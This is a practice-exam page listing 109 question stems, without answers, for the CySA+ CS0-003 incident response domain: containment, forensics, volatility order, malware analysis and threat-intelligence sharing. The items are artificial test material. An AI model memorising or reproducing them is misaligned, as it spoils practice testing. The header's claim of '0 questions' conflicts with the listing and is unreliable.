Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Free Resources

Difficulty IndexLearn — Free ChaptersIT GlossaryFree Tools & LabsStudy GuidesCareer RoadmapsBrowse by VendorCisco Command ReferenceCCNA Scenarios

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Incident Response and Management practice sets

CS0-003 Incident Response and Management • Complete Question Bank

CS0-003 Incident Response and Management — All Questions With Answers

Complete CS0-003 Incident Response and Management question bank — all 0 questions with answers and detailed explanations.

109
Questions
Free
No signup
Certifications/CS0-003/Practice Test/Incident Response and Management/All Questions
Question 1easymultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?

Question 2mediummultiple choice
Read the full Incident Response and Management explanation →

An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?

Question 3hardmultiple choice
Read the full Incident Response and Management explanation →

A forensic analyst is investigating a suspected data breach involving a compromised workstation. The analyst wants to collect volatile data in accordance with the order of volatility. Which sequence of data collection is correct?

Question 4mediummultiple choice
Read the full Incident Response and Management explanation →

After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?

Question 5mediummultiple choice
Read the full Incident Response and Management explanation →

During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?

Question 6easymultiple choice
Read the full Incident Response and Management explanation →

An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?

Question 7mediummultiple choice
Read the full Incident Response and Management explanation →

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?

Question 8hardmultiple choice
Read the full Incident Response and Management explanation →

A security analyst is performing memory acquisition on a compromised Linux server using LiME. The analyst needs to capture the memory image with minimal impact on the system. Which of the following parameters should the analyst use to ensure the output is forensically sound?

Question 9easymultiple choice
Read the full Incident Response and Management explanation →

An analyst receives an alert about a user account that has been locked out multiple times within an hour. The account belongs to a system administrator. Which incident category does this scenario most likely fall under?

Question 10mediummultiple choice
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst creates a disk image using dd with a SHA256 hash. Later, the analyst needs to verify the integrity of the image before analysis. Which command should the analyst use to compare the original hash with a newly computed hash?

Question 11mediummultiple choice
Read the full Incident Response and Management explanation →

An organization has been experiencing repeated phishing attacks that bypass email filters. The incident response team wants to enhance detection by creating rules based on characteristics of the phishing emails. Which of the following IOCs would be most effective for detecting similar phishing campaigns?

Question 12hardmultiple choice
Read the full Incident Response and Management explanation →

During a post-incident activity, the CSIRT performs a root cause analysis for a data breach. They discover that the breach originated from a misconfigured S3 bucket that allowed public read access. Which of the following actions should be included in the lessons learned to prevent recurrence?

Question 13mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is responding to a potential data exfiltration incident. As part of the containment strategy, the analyst must preserve evidence. Which TWO actions should the analyst take before containment? (Select two.)

Question 14hardmulti select
Read the full Incident Response and Management explanation →

A CSIRT is investigating a ransomware incident that encrypted files on multiple servers. The team needs to determine the initial infection vector. Which THREE pieces of evidence should the team prioritize collecting? (Select three.)

Question 15easymulti select
Read the full Incident Response and Management explanation →

A security analyst is reviewing IOCs from a threat intelligence feed. The analyst wants to enrich the IOCs using open-source tools. Which THREE tools are commonly used for IOC enrichment? (Select three.)

Question 16easymultiple choice
Read the full Incident Response and Management explanation →

During which phase of the NIST SP 800-61 incident response lifecycle would an organization conduct a lessons learned meeting?

Question 17mediummultiple choice
Read the full Incident Response and Management explanation →

A security analyst detects ransomware on a critical server. Which containment strategy should be implemented FIRST to minimize damage?

Question 18hardmultiple choice
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst needs to acquire memory from a Linux server. Which tool is specifically designed for this purpose?

Question 19easymultiple choice
Read the full Incident Response and Management explanation →

Which of the following is the MOST volatile data according to the order of volatility?

Question 20mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is reviewing a suspicious executable using static analysis. Which of the following would provide information about the functions the executable imports from system libraries?

Question 21hardmultiple choice
Read the full Incident Response and Management explanation →

A SOC analyst receives an alert from a threat intelligence platform (TIP) about a new phishing campaign. The indicator is a URL. Which enrichment source is BEST for determining the URL's current hosting infrastructure?

Question 22mediummultiple choice
Read the full Incident Response and Management explanation →

During a post-incident review, the CSIRT identifies that the mean time to detect (MTTD) is significantly higher than the industry benchmark. Which initiative would MOST likely reduce MTTD?

Question 23easymultiple choice
Read the full Incident Response and Management explanation →

An organization has identified indicators of compromise (IOCs) from a recent incident. Which data format is specifically designed for sharing threat intelligence in a standardized, machine-readable way?

Question 24mediummultiple choice
Read the full Incident Response and Management explanation →

A security analyst is investigating a potential data breach. The analyst needs to preserve evidence before containment. Which of the following actions is MOST appropriate at this stage?

Question 25hardmultiple choice
Read the full Incident Response and Management explanation →

An analyst runs a YARA rule against a set of files and gets a hit. The rule was written to detect a specific malware family. What is the PRIMARY purpose of using YARA rules in this context?

Question 26mediummultiple choice
Read the full Incident Response and Management explanation →

After a DDoS attack, the CSIRT wants to share IOCs with other organizations. Which protocol is specifically designed for automated, real-time threat intelligence sharing?

Question 27easymultiple choice
Read the full Incident Response and Management explanation →

Which of the following is an example of a behavioral indicator of compromise (IOC) observed during dynamic malware analysis?

Question 28mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Question 29hardmulti select
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst must acquire digital evidence while maintaining forensic soundness. Which THREE practices should the analyst follow? (Choose three.)

Question 30mediummulti select
Read the full Incident Response and Management explanation →

A company has experienced a ransomware attack that encrypted critical servers. The incident response team is in the containment, eradication, and recovery phase. Which THREE actions are part of long-term containment? (Choose three.)

Question 31mediummultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a workstation to an external IP address known for command and control (C2) activity. Which classification should the analyst assign to this incident?

Question 32easymultiple choice
Read the full Incident Response and Management explanation →

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

Question 33hardmultiple choice
Read the full Incident Response and Management explanation →

During forensic analysis of a compromised server, an analyst needs to preserve evidence in order of volatility. Which of the following actions should the analyst perform FIRST?

Question 34mediummultiple choice
Read the full Incident Response and Management explanation →

A security analyst is conducting static analysis of a suspicious executable. Which of the following tools or techniques is BEST suited for extracting strings and viewing the import table?

Question 35mediummultiple choice
Read the full Incident Response and Management explanation →

After containing a security incident, the incident response team conducts a root cause analysis. Which of the following is the PRIMARY purpose of this activity?

Question 36easymultiple choice
Read the full Incident Response and Management explanation →

An analyst receives a threat intelligence feed containing IOCs in STIX format. Which of the following BEST describes the purpose of STIX?

Question 37mediummultiple choice
Read the full Incident Response and Management explanation →

During post-incident activities, the security team reviews metrics. Which metric measures the average time taken to detect an incident?

Question 38hardmultiple choice
Read the full Incident Response and Management explanation →

A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?

Question 39easymultiple choice
Read the full Incident Response and Management explanation →

Which of the following is the correct order of volatility for digital evidence?

Question 40mediummultiple choice
Read the full Incident Response and Management explanation →

An incident responder needs to collect memory from a Linux system during an incident. Which tool should the responder use?

Question 41hardmultiple choice
Read the full Incident Response and Management explanation →

During a post-incident review, the team identifies that detection was delayed because alerts from multiple sources were not correlated. Which improvement would BEST address this issue?

Question 42mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is investigating a suspected data breach and needs to preserve network logs. Which of the following actions is MOST appropriate?

Question 43mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is performing incident response for a suspected malware outbreak. Which TWO actions are examples of long-term containment? (Select TWO.)

Question 44hardmulti select
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst must preserve evidence in accordance with forensic sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Question 45easymulti select
Read the full Incident Response and Management explanation →

An incident response team is analyzing indicators of compromise (IOCs) from a phishing campaign. Which THREE of the following are commonly used IOC types? (Select THREE.)

Question 46mediummultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

Question 47hardmultiple choice
Read the full Incident Response and Management explanation →

An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?

Question 48easymultiple choice
Read the full Incident Response and Management explanation →

An analyst needs to capture the contents of volatile memory from a Windows system suspected of being compromised. Which tool should the analyst use to acquire a memory image?

Question 49mediummultiple choice
Read the full Incident Response and Management explanation →

During a phishing incident, an analyst extracts a URL from the email body and searches VirusTotal. The URL is associated with a credential harvesting page. Which type of indicator is this URL?

Question 50mediummultiple choice
Read the full Incident Response and Management explanation →

An incident responder needs to collect forensic evidence from a server that was attacked. The evidence includes network connections, running processes, memory contents, and disk data. According to the order of volatility, which piece of evidence should the responder collect FIRST?

Question 51hardmultiple choice
Read the full DNS explanation →

After containing a data breach, the incident response team discovers that an attacker exfiltrated sensitive data over DNS tunneling. Which of the following detection rules would BEST identify similar activity in the future?

Question 52easymultiple choice
Read the full Incident Response and Management explanation →

An organization's security team receives a report of a potential insider threat. An employee is suspected of accessing sensitive files without authorization. Which incident category BEST describes this scenario?

Question 53mediummultiple choice
Read the full Incident Response and Management explanation →

An incident responder is called to a server room where a critical database server is exhibiting signs of compromise. The responder must preserve evidence while preventing further damage. Which of the following is a short-term containment strategy that also preserves evidence?

Question 54mediummultiple choice
Read the full Incident Response and Management explanation →

A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?

Question 55easymultiple choice
Read the full Incident Response and Management explanation →

An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?

Question 56hardmultiple choice
Read the full Incident Response and Management explanation →

During a DDoS attack, the incident response team notices that the attack traffic originates from multiple IP addresses across different countries. The team decides to implement a long-term containment strategy. Which action is MOST appropriate for long-term containment?

Question 57mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensic sound procedure should the analyst perform?

Question 58mediummulti select
Read the full Incident Response and Management explanation →

An incident response team is conducting post-incident activities after a ransomware attack. The team wants to improve detection and response for future incidents. Which TWO actions are most appropriate for updating detection rules? (Select TWO.)

Question 59hardmulti select
Read the full Incident Response and Management explanation →

A security analyst is investigating a potential data exfiltration incident. The analyst captures memory from a Windows system and finds a process that is injecting code into other processes. Which THREE indicators from the memory analysis would MOST strongly suggest malicious activity? (Select THREE.)

Question 60easymulti select
Read the full Incident Response and Management explanation →

An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)

Question 61easymultiple choice
Read the full Incident Response and Management explanation →

During the preparation phase of the NIST SP 800-61 incident response lifecycle, a security analyst is tasked with ensuring the team has the necessary tools and resources. Which of the following is the MOST important activity to perform during this phase?

Question 62mediummultiple choice
Read the full Incident Response and Management explanation →

A security operations center (SOC) analyst receives an alert about a potential ransomware infection on a critical server. The incident response team needs to contain the threat quickly. Which of the following should be performed FIRST as a short-term containment measure?

Question 63hardmultiple choice
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

Question 64mediummultiple choice
Read the full Incident Response and Management explanation →

An organization has experienced a data breach involving personally identifiable information (PII). The incident response team has contained the breach and eradicated the threat. During the post-incident activity phase, which activity is MOST critical to prevent future similar incidents?

Question 65easymultiple choice
Read the full Incident Response and Management explanation →

A security analyst is reviewing indicators of compromise (IOCs) from a recent phishing campaign. Which of the following is an example of an email-related IOC?

Question 66mediummultiple choice
Read the full Incident Response and Management explanation →

During a dynamic malware analysis session, a security analyst uses a sandbox to detonate a suspicious file. Which of the following observations would be considered a behavioral indicator of compromise (IOC)?

Question 67hardmultiple choice
Read the full Incident Response and Management explanation →

A security analyst is investigating a suspected insider threat incident. The analyst needs to preserve evidence before containment. Which of the following actions should the analyst prioritize to maintain the integrity of digital evidence?

Question 68mediummultiple choice
Read the full Incident Response and Management explanation →

An organization uses MISP (Malware Information Sharing Platform) to share threat intelligence with trusted partners. Which of the following standards is commonly used by MISP to structure and exchange threat intelligence data?

Question 69easymultiple choice
Read the full Incident Response and Management explanation →

An incident responder is classifying an incident. The incident involves ransomware encrypting files on multiple workstations, causing significant business disruption. Which severity level should be assigned to this incident?

Question 70mediummultiple choice
Read the full Incident Response and Management explanation →

During a forensic analysis, an analyst needs to collect data in order of volatility. Which of the following represents the correct order from most volatile to least volatile?

Question 71hardmultiple choice
Read the full Incident Response and Management explanation →

An analyst is performing static analysis on a suspicious executable. The analyst discovers that the PE file has a suspicious section name and a high entropy value. Which tool or technique would be MOST useful for further analyzing the packed nature of the file?

Question 72mediummultiple choice
Read the full Incident Response and Management explanation →

After a DDoS attack, the incident response team wants to improve detection and prevention. Which of the following metrics would be MOST useful for evaluating the effectiveness of the response?

Question 73mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is investigating a potential malware infection on a Windows workstation. The analyst needs to collect evidence while preserving the order of volatility. Which TWO pieces of data should the analyst collect FIRST? (Select TWO)

Question 74mediummulti select
Read the full Incident Response and Management explanation →

An incident responder is performing containment of a ransomware incident that has encrypted files on several file servers. Which THREE actions are appropriate for long-term containment and recovery? (Select THREE)

Question 75hardmulti select
Read the full Incident Response and Management explanation →

During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE)

Question 76mediummultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies an alert indicating a high volume of outbound traffic from a critical server to an unknown IP address. Which of the following actions should the analyst perform FIRST?

Question 77easymultiple choice
Read the full Incident Response and Management explanation →

A security analyst is classifying an incident where an employee's workstation is infected with ransomware that encrypts files and displays a ransom note. Which incident category and severity level best describe this scenario?

Question 78hardmultiple choice
Read the full Incident Response and Management explanation →

During forensic analysis of a compromised Linux server, an analyst needs to acquire memory evidence. The server is running and the analyst has root access. Which of the following tools should the analyst use to capture the contents of RAM with the least impact on the system?

Question 79mediummultiple choice
Read the full Incident Response and Management explanation →

A security team is responding to a phishing incident that led to credential compromise. Which of the following is the BEST short-term containment action to prevent further damage?

Question 80mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is performing static analysis on a suspicious executable file. Which of the following would be MOST useful to identify potential malicious behavior without executing the file?

Question 81hardmultiple choice
Read the full Incident Response and Management explanation →

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for incidents is significantly higher than industry benchmarks. Which of the following improvements would most directly reduce MTTD?

Question 82easymultiple choice
Read the full Incident Response and Management explanation →

Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?

Question 83mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?

Question 84mediummultiple choice
Read the full Incident Response and Management explanation →

When performing digital forensics, which of the following represents the correct order of volatility from most volatile to least volatile?

Question 85easymultiple choice
Read the full Incident Response and Management explanation →

A security analyst needs to share threat intelligence with other organizations in a standardized format. Which of the following standards should the analyst use?

Question 86hardmultiple choice
Read the full Incident Response and Management explanation →

During a ransomware incident, the incident response team needs to preserve evidence before containment. Which of the following actions should be performed BEFORE isolating the infected system from the network?

Question 87mediummultiple choice
Read the full Incident Response and Management explanation →

An organization is experiencing a DDoS attack targeting its web servers. Which of the following is the BEST short-term containment strategy?

Question 88mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)

Question 89mediummulti select
Read the full Incident Response and Management explanation →

During dynamic analysis of a suspicious file in a sandbox environment, which THREE behaviors are considered indicators of compromise (IOCs) that suggest malicious activity? (Choose THREE.)

Question 90easymulti select
Read the full Incident Response and Management explanation →

An incident response team is conducting post-incident activities after containing a malware outbreak. Which TWO activities should be included in the lessons learned phase? (Choose TWO.)

Question 91easymultiple choice
Read the full Incident Response and Management explanation →

During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

Question 92mediummultiple choice
Read the full Incident Response and Management explanation →

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

Question 93hardmultiple choice
Read the full Incident Response and Management explanation →

During a forensic investigation of a compromised Linux server, the analyst needs to acquire memory for analysis. The system is running and the analyst cannot power it off. Which tool is MOST appropriate for acquiring memory in this scenario?

Question 94mediummultiple choice
Read the full Incident Response and Management explanation →

An analyst is investigating a suspected data breach. The analyst needs to identify which files were exfiltrated and preserve evidence. According to the order of volatility, which of the following should the analyst capture FIRST?

Question 95easymultiple choice
Read the full Incident Response and Management explanation →

A security analyst is analyzing a suspicious file using static analysis. The analyst wants to identify imported functions to determine the file's capabilities. Which tool or technique is BEST suited for this task?

Question 96mediummultiple choice
Read the full Incident Response and Management explanation →

During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?

Question 97mediummultiple choice
Read the full Incident Response and Management explanation →

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

Question 98hardmultiple choice
Read the full Incident Response and Management explanation →

An analyst is investigating a possible data exfiltration incident. The analyst has acquired a memory dump from the compromised system. Which of the following would be the BEST approach to extract evidence of exfiltration?

Question 99easymultiple choice
Read the full Incident Response and Management explanation →

An organization wants to automate the sharing of threat intelligence with other trusted entities using a standardized protocol. Which protocol is specifically designed for this purpose?

Question 100mediummultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of an incident, an analyst identifies a file with a hash that matches a known malware signature. The analyst wants to enrich this IOC with additional context. Which resource is BEST suited for this enrichment?

Question 101mediummulti select
Read the full Incident Response and Management explanation →

A security analyst is performing forensic analysis of a compromised system. The analyst needs to acquire disk evidence in a forensically sound manner. Which TWO actions should the analyst take to ensure the integrity of the evidence? (Choose TWO.)

Question 102hardmulti select
Read the full Incident Response and Management explanation →

During a malware outbreak, an incident responder uses YARA rules to detect similar malware across the environment. The responder created a custom YARA rule based on static analysis of the malware sample. Which THREE elements are MOST useful for creating an effective YARA rule for this malware? (Choose THREE.)

Question 103mediummulti select
Read the full Incident Response and Management explanation →

An organization is experiencing a distributed denial-of-service (DDoS) attack targeting its web servers. The incident response team is implementing containment strategies. Which TWO actions are appropriate for short-term containment of a DDoS attack? (Choose TWO.)

Question 104mediummulti select
Read the full Incident Response and Management explanation →

After a phishing incident, the security team wants to improve detection of similar attacks in the future. Which THREE actions should the team take as part of post-incident activity? (Choose THREE.)

Question 105hardmulti select
Read the full Incident Response and Management explanation →

A security analyst is investigating a potential insider threat where a user is suspected of exfiltrating sensitive data via USB drives. The analyst needs to gather evidence while preserving the chain of custody. Which THREE actions should the analyst perform? (Choose THREE.)

Question 106mediummultiple choice
Read the full Incident Response and Management explanation →

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which of the following is the most appropriate next step?

Question 107hardmultiple choice
Read the full Incident Response and Management explanation →

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?

Question 108mediummulti select
Read the full Incident Response and Management explanation →

A security team is responding to a suspected data breach involving exfiltration of customer data via email. During the containment phase, which TWO actions should the team perform to preserve evidence while preventing further data loss?

Question 109easymulti select
Read the full Incident Response and Management explanation →

During a post-incident review, a security analyst identifies that the mean time to detect (MTTD) for incidents is significantly higher than the industry benchmark. Which THREE actions should the analyst recommend to improve detection capabilities?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CS0-003 Practice Test 1 — 25 Questions→CS0-003 Practice Test 2 — 25 Questions→CS0-003 Practice Test 3 — 25 Questions→CS0-003 Practice Test 4 — 25 Questions→CS0-003 Practice Test 5 — 25 Questions→CS0-003 Practice Exam 1 — 20 Questions→CS0-003 Practice Exam 2 — 20 Questions→CS0-003 Practice Exam 3 — 20 Questions→CS0-003 Practice Exam 4 — 20 Questions→Free CS0-003 Practice Test 1 — 30 Questions→Free CS0-003 Practice Test 2 — 30 Questions→Free CS0-003 Practice Test 3 — 30 Questions→CS0-003 Practice Questions 1 — 50 Questions→CS0-003 Practice Questions 2 — 50 Questions→CS0-003 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Security OperationsVulnerability ManagementIncident Response and ManagementReporting and Communication

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Incident Response and Management setsAll Incident Response and Management questionsCS0-003 Practice Hub